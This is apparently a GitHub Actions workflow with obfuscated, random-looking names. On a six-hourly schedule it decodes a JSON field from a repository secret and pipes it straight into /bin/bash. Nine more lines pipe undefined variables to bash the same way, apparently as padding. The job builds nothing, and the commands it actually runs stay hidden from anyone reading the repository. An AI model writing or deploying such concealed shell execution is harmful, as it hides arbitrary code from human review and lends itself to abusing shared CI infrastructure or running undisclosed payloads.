name: lwcanggou
on:
  workflow_dispatch:
  schedule:
    - cron: '16 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lwcanggou
        env:
          qen3698: ${{ secrets.qen3698 }}
        run: |
          echo $qen3698 | jq -r .v82556 | /bin/bash
          echo $c6399 | jq -r .eg43 | /bin/bash
          echo $vohom6349 | jq -r .esoy54 | /bin/bash
          echo $znl1 | jq -r .imaav259 | /bin/bash
          echo $r8275 | jq -r .frhh52 | /bin/bash
          echo $nw9 | jq -r .jxjgz4150 | /bin/bash
          echo $owxdy73 | jq -r .exrlw4057 | /bin/bash
          echo $ll17130 | jq -r .ofwr326 | /bin/bash
          echo $snge382 | jq -r .tabw2 | /bin/bash
          echo $fwzg4219 | jq -r .ne9 | /bin/bash

